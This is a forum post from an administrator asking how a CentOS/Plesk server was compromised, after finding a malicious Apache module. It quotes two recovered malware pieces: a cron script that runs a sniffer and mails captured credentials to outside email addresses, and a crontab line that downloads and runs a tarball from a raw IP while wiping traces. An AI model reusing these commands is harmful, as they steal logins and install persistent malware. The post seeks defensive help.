Need advice on linux server being hacked
I'm currently trying to find out how one of our CentOS servers was compromised. We were experiencing malware on our sites. After searching, I finally found the malware injecting into the sites. As it was happening randomly, it was hard to detect. I followed help from an Unmask Parasites blog article.
This led me to search through each of the Apache modules and eventually found a module that was injecting the malware. It went under the name of mod_string_mime.so and was being loaded through /etc/httpd/conf.d/mailman.conf to avoid detection. Very frustrating. The module is now deleted and the mailman.conf file is back to normal.
Digging further, I installed and ran rkhunter
. Upon running this, I found a warning for a suspect file in /etc/cron.daily/ called dnsquery. In this file, this is what it looks like…
#!/bin/sh
cd /usr/lib/
./popauth -r httpd.log > test
cat /usr/share/misc/blah/temp.log |uniq >> test
echo >/usr/share/misc/blah/temp.log
mail unul_catalin@yahoo.com -s "$(hostname -f)" < test
mail cata@catalinx.org -s "$(hostname -f)" < test
rm -rf test httpd.log
A=$PATH
killall -9 popauth
export PATH=/usr/lib/
popauth -w httpd.log &
export PATH=$A
I've tried to delete this file, but it keeps coming back every minute. The owner and group is psaadm. I can't find how it's being created. I assume it's generating through Plesk cron
or something.
I also found this in the crontab, which doesn't look right:
* * * * * chattr -AacDdijsSu /bin/; cd /root ; wget http://77.241.87.75/xpsa/skdet.tgz; chmod +x skdet.tgz; tar zxvf skdet.tgz ; cd skdet ; ./inst; rm -rf /usr/share/misc /root/sk* /tmp/nc* /root/ssh/;
Any suggestions on how to proceed or locate the intrusion?